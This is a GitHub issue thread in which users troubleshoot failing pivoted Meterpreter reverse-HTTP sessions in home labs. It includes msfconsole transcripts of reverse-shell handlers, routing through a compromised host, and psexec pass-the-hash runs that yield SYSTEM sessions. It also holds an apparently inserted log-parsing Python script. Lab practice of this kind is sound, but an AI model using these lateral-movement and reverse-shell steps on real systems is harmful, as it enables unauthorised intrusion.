rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Using meterpreter_reverse_http Payload for pivoting #18950

Open MDhouiou opened 2 months ago

MDhouiou commented 2 months ago

Hi,

I'm testing some attack scenarios in my home lab. To gain initial access to the first machine, I am utilizing the linux/x64/meterpreter_reverse_http payload. Subsequently, I am employing the same payload to facilitate lateral movement to the second machine.

Scenario: Kali ->(meterpreter_reverse_http)->First target (Debian) ->(meterpreter_reverse_http)->Second target (Debian)

While the first session works fine without any problems, when I set up the listener for the second session and run the second payload on the second target VM, it doesn't open the second session.

I do receive the request at the handler, but no session is opened.

[First Session works] (image)

[Second Session not opening] (image)

I've also tested the scenario: Kali ->(linux/x64/meterpreter_reverse_http)->First target (Debian) ->(windows/meterpreter_reverse_http)->Second target (Windows)

In this case, both sessions work without any problem.

So, my question is: Why can't the second session be opened in the first scenario?

I would greatly appreciate any assistance or guidance from anyone who can help.

Thank you :)

smcintyre-r7 commented 2 months ago

I'm thinking there's a configuration error here. Would it be possible for you to:

MDhouiou commented 2 months ago

Hi Spencer,

Here is the configuration of the VMs:

--First Scenario with two linux target VMs--
Kali: 172.16.1.200/24
Debian(First Target): 172.16.1.10/24
Debian(Second Target): 172.16.1.20/24

--Second Scenario with linux and windows target VMs--
Kali: 172.16.1.200/24
Debian(First Target): 172.16.1.10/24
Windows(Second Target): 172.16.1.100/24

And here is the copied text from the msfconsole with the payload options:

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter_reverse_http
PAYLOAD => linux/x64/meterpreter_reverse_http

msf6 exploit(multi/handler) > set LHOST 172.16.1.200
LHOST => 172.16.1.200
msf6 exploit(multi/handler) > set LPORT 3980
LPORT => 3980
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):                                                                                     

   Name  Current Setting  Required  Description                                                                             
   ----  ---------------  --------  -----------                                                                             

Payload options (linux/x64/meterpreter_reverse_http):                                                                       

   Name   Current Setting  Required  Description                                                                            
   ----   ---------------  --------  -----------                                                                            
   LHOST  172.16.1.200     yes       The local listener hostname                                                            
   LPORT  3980             yes       The local listener port                                                                
   LURI                    no        The HTTP Path                                                                          

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >
[*] Started HTTP reverse handler on http://172.16.1.200:3980
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Redirecting stageless connection from /zk_HKJofBAD2T_BNk76ARwUXNNxKiAdLGTEbkDxyqw6Nn5UVKVWBTlMuEK with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15'
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Redirecting stageless connection from /zk_HKJofBAD2T_BNk76ARw0AgELhZdc5oi0NuuuQkYPNKLjQsVygYEOs2rOeVujNJ6ERY1D-saOg0Eamx94KUdIrdtQJpIZtayQpQziToz with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15'
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Redirecting stageless connection from /zk_HKJofBAD2T_BNk76ARw8ZyB1bn with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15'
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Redirecting stageless connection from /zk_HKJofBAD2T_BNk76ARwCRrS8K3T503x6vrUduA2rmApNRQrA7PsGbawYNH8o6j4wV86UT-pBAdVNgYYoKaA1m371Pp-a5-pcLi9MN6h_W_45knsYzMJf8dl3tU with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15'
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Redirecting stageless connection from /zk_HKJofBAD2T_BNk76ARwXM_ddLz17HR16-lrIH7eCD7CP7vNlyNznpivYelTPhStOGQJrlwKaoaFL_Iroqd_bVa9U5REWpNm9rw with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15'
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (172.16.1.200:3980 -> 172.16.1.10:39852) at 2024-03-13 10:46:52 +0100

msf6 exploit(multi/handler) > route add 172.16.1.0/24 1
[*] Route added
msf6 exploit(multi/handler) > set LHOST 172.16.1.10
LHOST => 172.16.1.10

msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (linux/x64/meterpreter_reverse_http):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.1.10      yes       The local listener hostname
   LPORT  3980             yes       The local listener port
   LURI                    no        The HTTP Path

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >
[*] Started HTTP reverse handler on http://172.16.1.10:3980
msf6 exploit(multi/handler) >
[*] http://172.16.1.10:3980 handling request from 172.16.1.20; (UUID: paiwgyxe) Redirecting stageless connection from /wsH7kz2P3E77yv3InjuMzAfVrCiLtiO7c with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'

Thank you for your support :)

smcintyre-r7 commented 2 months ago

What's the output of the jobs command? It should show that the multi/handler module is running, and in the Payload options that it's listening via the session. That would be an important thing to confirm. Next you should use your session on the first compromised host (Debian 1, 172.16.1.10) and run netstat to ensure that it's listening on 3980.

If all that's in place, you should check that Debian 1 doesn't have any kind of firewall or anything that'd be preventing the connection from the second target.

It looks like everything you've set up is correct, but checking those things can help eliminate some common problems.
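The handler output pasted earlier in this thread is the other place to look: for each payload UUID the handler prints "Redirecting stageless connection" lines, then "Attaching orphaned/stageless session..." (stageless) or "Staging ... payload" (staged), and only then "Meterpreter session N opened". A UUID that keeps redirecting without ever attaching is exactly the second-hop symptom reported above. The script below is an added example written for this thread, not part of Metasploit; it groups handler lines by UUID and reports which ones produced a session. The sample log is abridged from the console output posted above (User-Agent strings shortened), and the line formats it matches are assumed to be the ones shown there.

```python
"""Group exploit/multi/handler console output by payload UUID and report which
connection attempts actually produced a Meterpreter session.
Added example for this issue thread; not Metasploit code. Line formats are
assumed from the console output quoted in the thread."""
import re

# "[*] http://LISTENER handling request from PEER; (UUID: xxxx) EVENT ..."
HANDLER_RE = re.compile(
    r"^\[[*!+-]\] (?P<listener>https?://\S+) handling request from (?P<peer>\S+); "
    r"\(UUID: (?P<uuid>\w+)\) (?P<event>.*)$"
)
# "[*] Meterpreter session N opened (CONNECTION) at ..."
SESSION_OPENED_RE = re.compile(
    r"^\[\*\] Meterpreter session (?P<sid>\d+) opened \((?P<conn>[^)]*)\)"
)

# Abridged from the thread above: first hop (session 1 opened) and second hop
# (request seen, never attached); third block is a staged payload that opened.
SAMPLE_LOG = """\
[*] Started HTTP reverse handler on http://172.16.1.200:3980
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Redirecting stageless connection from /zk_HKJofBAD2T_BNk76ARwUXNNxKiAdLGTEbkDxyqw6Nn5UVKVWBTlMuEK with UA 'Mozilla/5.0'
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Redirecting stageless connection from /zk_HKJofBAD2T_BNk76ARw8ZyB1bn with UA 'Mozilla/5.0'
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (172.16.1.200:3980 -> 172.16.1.10:39852) at 2024-03-13 10:46:52 +0100
[*] Started HTTP reverse handler on http://172.16.1.10:3980
[*] http://172.16.1.10:3980 handling request from 172.16.1.20; (UUID: paiwgyxe) Redirecting stageless connection from /wsH7kz2P3E77yv3InjuMzAfVrCiLtiO7c with UA 'Mozilla/5.0'
[*] http://192.168.159.128:8080 handling request from 192.168.159.10; (UUID: 5tm6qdwe) Staging x64 payload (202844 bytes) ...
[*] Meterpreter session 13 opened (192.168.159.128:8080 -> 192.168.159.10:49840) at 2024-04-15 10:18:23 -0400
"""


def parse_handler_log(lines):
    """Return {uuid: record}. The 'session opened' line carries no UUID, so it is
    credited to the UUID of the most recent handler line, which is how the
    console interleaves them."""
    records = {}
    last_uuid = None
    for raw in lines:
        line = raw.strip()
        m = HANDLER_RE.match(line)
        if m:
            rec = records.setdefault(m["uuid"], {
                "listener": m["listener"], "peer": m["peer"],
                "redirects": 0, "staged": False, "attached": False, "session": None,
            })
            event = m["event"]
            if event.startswith("Redirecting stageless connection"):
                rec["redirects"] += 1
            elif event.startswith("Attaching orphaned/stageless session"):
                rec["attached"] = True
            elif event.startswith("Staging "):
                rec["staged"] = True
            last_uuid = m["uuid"]
            continue
        m = SESSION_OPENED_RE.match(line)
        if m and last_uuid is not None:
            records[last_uuid]["session"] = int(m["sid"])
    return records


def diagnose(records):
    """One verdict string per UUID, phrased in terms of what the log shows."""
    verdicts = {}
    for uuid, rec in records.items():
        if rec["session"] is not None:
            verdicts[uuid] = "session %d opened" % rec["session"]
        elif rec["attached"] or rec["staged"]:
            verdicts[uuid] = "handler attached/staged but no 'session opened' line followed"
        else:
            verdicts[uuid] = (
                "%d redirect(s) from %s, never attached: the request reached the "
                "listener on %s but no session was handed back"
                % (rec["redirects"], rec["peer"], rec["listener"])
            )
    return verdicts


if __name__ == "__main__":
    for uuid, verdict in diagnose(parse_handler_log(SAMPLE_LOG.splitlines())).items():
        print(uuid, "->", verdict)
```

Run it against a saved msfconsole transcript (`parse_handler_log(open(path))`) after the jobs and netstat checks described above. A UUID stuck in the "never attached" state on the pivot listener narrows the problem to the hop between the listener on the first target and the framework, rather than to the second target being unable to reach the port at all.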

LongWayHomie commented 1 month ago

Hello, bumping this since I have a similar problem with the windows/x64/meterpreter/reverse_http payload. Pivoting with this payload seems not to be valid and msf does not spawn a session. Here's a snippet from my lab:

msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share

   Used when making a new connection via RHOSTS:

   Name       Current Setting                                                    Required  Description
   ----       ---------------                                                    --------  -----------
   RHOSTS     10.10.122.30                                                       no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445                                                                no        The target port (TCP)
   SMBDomain  dev.cyberbotic.io                                                  no        The Windows domain to use for authentication
   SMBPass    59fc0f884922b4ce376051134c71e22c:59fc0f884922b4ce376051134c71e22c  no        The password for the specified username
   SMBUser    jking                                                              no        The username to authenticate as

   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on

Payload options (windows/x64/meterpreter/reverse_http):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.123.102    yes       The local listener hostname
   LPORT     5555             yes       The local listener port
   LURI                       no        The HTTP Path

Exploit target:

   Id  Name
   --  ----
   1   PowerShell

View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > set LPORT 6666
LPORT => 6666
msf6 exploit(windows/smb/psexec) > exploit

[*] 10.10.122.30:445 - Connecting to the server...
[*] 10.10.122.30:445 - Authenticating to 10.10.122.30:445|dev.cyberbotic.io as user 'jking'...
[*] 10.10.122.30:445 - Executing the payload...
[+] 10.10.122.30:445 - Service start timed out, OK if running a command or non-service executable...
[!] http://10.10.123.102:6666 handling request from 10.10.122.30; (UUID: ajjzjj73) Without a database connected that payload UUID tracking will not work!
[*] http://10.10.123.102:6666 handling request from 10.10.122.30; (UUID: ajjzjj73) Staging x64 payload (202844 bytes) ...
[!] http://10.10.123.102:6666 handling request from 10.10.122.30; (UUID: ajjzjj73) Without a database connected that payload UUID tracking will not work!
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/psexec) > sessions

Active sessions
===============

  Id  Name  Type                     Information            Connection
  --  ----  ----                     -----------            ----------
  6         meterpreter x64/windows  DEV\jking @ WKSTN-2    10.9.254.6:8080 -> 10.10.122.254:44120 (10.10.122.254)
  7         meterpreter x64/windows  DEV\bfarmer @ WKSTN-2  10.9.254.6:8080 -> 10.10.122.254:44122 (10.10.123.102)
  8         meterpreter x64/windows  DEV\bfarmer @ WKSTN-2  10.9.254.6:8080 -> 10.10.122.254:44154 (10.10.122.254)
  9         meterpreter x64/windows                         10.10.122.30:6666 -> 10.10.122.30:57286 via session 7 (10.10.122.30)

msf6 exploit(windows/smb/psexec) > 
[-] Meterpreter session 9 is not valid and will be closed
[*] 10.10.122.30 - Meterpreter session 9 closed.  Reason: Died

msf6 exploit(windows/smb/psexec) > jobs

Jobs
====

  Id  Name                           Payload                               Payload opts
  --  ----                           -------                               ------------
  1   Auxiliary: server/socks_proxy
  21  Exploit: multi/handler         windows/x64/meterpreter/reverse_http  http://10.9.254.6:8080
  23  Exploit: multi/handler         windows/x64/meterpreter/reverse_http  http://10.10.123.102:6666 via the meterpreter on session 7

MSF is listening on 10.9.254.6 (Kali) and a listener is also set up on the first victim (pivot) at 10.10.123.102 on port 6666. I'm trying to spawn a session on server 10.10.122.30, but the session is dying while downloading from the stager. I have tried with another HTTP payload, windows/x64/meterpreter/reverse_winhttp, and it seems to be working fine. So my best guess is that reverse_http is causing some problems while pivoting. And yeah, there's a squid proxy in the lab, which is proxying traffic for workstations (10.10.123.102).

smcintyre-r7 commented 1 month ago

Yeah, I still can't reproduce any issues here. In my lab setup .128 is my system running Metasploit, .10 is one Windows target and .40 is another. I'm able to open my first Meterpreter session to .10 and then a second to .40 by having Metasploit start a listener on .10. I tried with the reverse_http, reverse_https and reverse_winhttp stagers. All of them worked.

metasploit-framework (S:0 J:0) exploit(windows/smb/psexec) > run RHOSTS=192.168.159.10 SMBPass=Password1! LHOST=192.168.159.128 PAYLOAD=windows/x64/meterpreter/reverse_http

[*] Started HTTP reverse handler on http://192.168.159.128:8080
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Executing the payload...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] http://192.168.159.128:8080 handling request from 192.168.159.10; (UUID: 5tm6qdwe) Staging x64 payload (202844 bytes) ...
[*] Meterpreter session 13 opened (192.168.159.128:8080 -> 192.168.159.10:49840) at 2024-04-15 10:18:23 -0400

meterpreter > background 
[*] Backgrounding session 13...
metasploit-framework (S:1 J:0) exploit(windows/smb/psexec) > run RHOSTS=192.168.159.40 SMBPass=Password2! LHOST=192.168.159.10 ReverseListenerComm=13 PAYLOAD=windows/x64/meterpreter/reverse_http

[*] Started HTTP reverse handler on http://192.168.159.10:8080
[*] 192.168.159.40:445 - Connecting to the server...
[*] 192.168.159.40:445 - Authenticating to 192.168.159.40:445 as user 'smcintyre'...
[*] 192.168.159.40:445 - Selecting PowerShell target
[*] 192.168.159.40:445 - Executing the payload...
[+] 192.168.159.40:445 - Service start timed out, OK if running a command or non-service executable...
[*] http://192.168.159.10:8080 handling request from 192.168.159.40; (UUID: aoiyj5x9) Staging x64 payload (202844 bytes) ...
[*] Meterpreter session 14 opened (192.168.159.40:8080 -> 192.168.159.40:64828 via session 13) at 2024-04-15 10:18:43 -0400

meterpreter > background 
[*] Backgrounding session 14...
metasploit-framework (S:2 J:0) exploit(windows/smb/psexec) > sessions

Active sessions
===============

  Id  Name  Type                     Information                 Connection
  --  ----  ----                     -----------                 ----------
  13        meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DC    192.168.159.128:8080 -> 192.168.159.10:49840 (192.168.159.10)
  14        meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DC22  192.168.159.40:8080 -> 192.168.159.40:64828 via session 13 (192.168.159.40)

metasploit-framework (S:2 J:0) exploit(windows/smb/psexec) > 

I recommend you try to simplify your setup as I did by not using the exploit/multi/handler module and just have the psexec exploit start the listener. You can tell it which session to use to start the handler with the ReverseListenerComm datastore option.

github-actions[bot] commented 2 weeks ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.